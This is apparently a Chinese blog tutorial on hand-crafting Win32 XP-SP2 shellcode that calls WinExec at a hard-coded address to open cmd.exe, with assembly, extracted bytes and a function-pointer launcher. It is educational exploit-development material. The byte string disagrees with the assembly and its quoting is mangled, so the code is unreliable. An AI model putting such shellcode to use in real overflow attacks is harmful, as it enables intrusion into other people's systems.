看来我是要从汇编入手做些事情了。汇编如今的用途不过是逆向工程,加解密,有害代码分析,漏洞挖掘以及一些有害代码生成,如病毒,缓冲区溢出攻击。首先申明这些我都不会,有些只知道皮毛。我连菜鸟都算不上,最多是条菜虫。
这几天看了看缓冲区溢出,写下来一点心得,一是希望有高人指导,二是总结一下。
今天说说shellcode的生成,当然是win32平台下的,linux本人没有什么研究(菜吧)。
shellcode一般C语言或者汇编语言生成,如果你也是刚学shellcode,最好手动自己生成,但是如果你已是高手就自己写个模版,自动生成。这方面Hume大侠已有论述,很多知名网络安全网站都有刊载。
现在举个最简单的手动生成shellcode的例子,假如我们已经找到了溢出点,这个shellcode会让你获取一个cmd命令行执行你想要执行的命令,很简单吧,说白了就是调用Winexec函数,只不过我们要把它转化为shellcode。平台xp-sp2,环境VC(就不用专门的 debugger了)。
由于已知了平台,我们首先获取想要API的地址,这里是WinExec。怎么获取?
HINSTANCE LibHandle = LoadLibrary("kernel32.dll");
MYPROC ProcAdd = (MYPROC) GetProcAddress(LibHandle, "WinExec");
得到ProcAdd =0x7c86114d,这个就是WinExec的地址了。
下面我用汇编写执行WinExec的代码,有点基础的人一看就明白。
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov [ebp-08h],63h //c
mov [ebp-07h],6Dh //m
mov [ebp-06h],64h //d
mov [ebp-05h],2Eh //.
mov [ebp-04h],65h //e
mov [ebp-03h],78h //x
mov [ebp-02h],65h //e
push 1 //压栈第一个参数
lea eax,[ebp-08h]
push eax //压栈第二个参数“cmd.exe”字符串
mov edx,0x7c86114d //调用WinExec
call edx
leave //mov esp,ebp pop ebp
下面打开VC调试器获取机器码。按alt+8,点右键选Code Bytes,然后就是体力活了,摘取机器码就行了。
最后的shellcode为shellcode[ ]=""x8B"xE5"x55"x8B"xEC"x33"xC0"x50"x83"xEC"x04"xC6"
""x45"xF8"x63"xC6"x45"xF9"x6D"xC6"x45"xFA"x64"xC6"
""x45"xFB"x2E"xC6"x45"xFC"x65"xC6"x45"xFD"x78"xC6"
""x45"xFE"x65"xB8"x01"x00"x00"x00"x50"x8D"x45"xF8"
""x50"xBA"x4D"x11"x86"x7C"xFF"xD2"xC9";
这么调用一下:((void(*)(void)) &shellcode)();一个命令行窗口就出来了,很简单。
注意的问题:子程序调用规则和堆栈平衡问题!子程序调用规则,唉,我实在懒得说了,如果你常调试汇编代码这个就是个超简单的问题了。push ebp mov ebp,esp主要就是这两句,保护ebp和给esp赋值,我不细说了。最后不要忘了给esp还原值和ebp的出栈,否则会压栈不平衡。
这仅仅是个手动写shellcode的最简单例子,可以提出以下问题:1。通用型问题,在不同的平台下不要说API函数就连Kernel32.dll基址也不同,这时你需要你个通用性的shellcode,自己找Kernel32.dll的基址,自己找想要的API(这让我想起了线程插入)2。方便快捷问题,如果shellcode的功能较多总不能人力摘取机器码吧?这就有个自动提取问题。这个问题随着我以后深入学习会讨论。
从这个例子入手,可以看出写shellcode并非难于登天,由简如繁,希望以后有兴趣的人和我一起讨论。
如果明天有时间我将要初步讨论下缓冲区溢出问题,我特地写了个例子程序,有助于我这种菜虫了解^_^。
|
安全中国首页 > 文章中心 > 黑客编程